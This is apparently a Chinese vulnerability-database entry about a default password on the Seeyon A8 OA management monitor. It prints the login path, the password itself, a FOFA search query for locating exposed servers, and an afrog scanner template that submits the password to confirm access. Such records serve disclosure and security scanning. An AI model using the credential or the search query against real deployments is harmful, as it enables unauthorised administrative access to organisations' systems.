seeyon-a8-management-monitor-default-password: A8 Management Monitor Default Password

日期: 2025-09-01 | 影响软件: seeyon a8 | POC: 已公开

漏洞描述

A8 Management Monitor 1.登录页面:/seeyon/management/index.jsp 2.默认密码:WLCCYBD@SEEYON fofa:app="致远互联-OA"

PoC代码[已公开]

id: seeyon-a8-management-monitor-default-password

info:
  name: A8 Management Monitor Default Password
  author: zan8in
  severity: medium
  verified: true
  description: |
    A8 Management Monitor 
    1.登录页面:/seeyon/management/index.jsp
    2.默认密码:WLCCYBD@SEEYON
    fofa:app="致远互联-OA" 
  
rules:
  r0:
    request:
      method: GET
      path: /seeyon/management/index.jsp
    expression: response.status == 200 && response.body.ibcontains(b'<title>A8 Management Monitor</title>')
  r1:
    request:
      method: POST
      path: /seeyon/management/index.jsp
      body: password=WLCCYBD@SEEYON
    expression: response.status == 302 && response.raw_header.ibcontains(b'/seeyon/management/status.jsp')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/seeyon-a8-management-monitor-default-password.yaml

相关漏洞推荐